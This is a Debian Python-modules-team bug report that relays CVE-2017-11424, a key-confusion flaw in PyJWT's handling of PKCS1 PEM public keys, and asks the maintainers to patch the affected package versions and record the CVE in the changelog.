[Python-modules-team] Bug#873244: pyjwt: CVE-2017-11424: Incorrect handling of PEM-encoded public keys
carnil at debian.org
Fri Aug 25 18:59:33 UTC 2017
Tags: security patch upstream
Control: found -1 0.2.1-1+deb8u1
the following vulnerability was published for pyjwt.
| In PyJWT 1.5.0 and below the `invalid_strings` check in
| `HMACAlgorithm.prepare_key` does not account for all PEM encoded
| public keys. Specifically, the PKCS1 PEM encoded format would be
| allowed because it is prefaced with the string `-----BEGIN RSA PUBLIC
| KEY-----` which is not accounted for. This enables
| symmetric/asymmetric key confusion attacks against users using the
| PKCS1 PEM encoded public keys, which would allow an attacker to craft
| JWTs from scratch.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
Please adjust the affected versions in the BTS as needed. I think this
should be present as well in 0.2.1-1+deb8u1.
More information about the Python-modules-team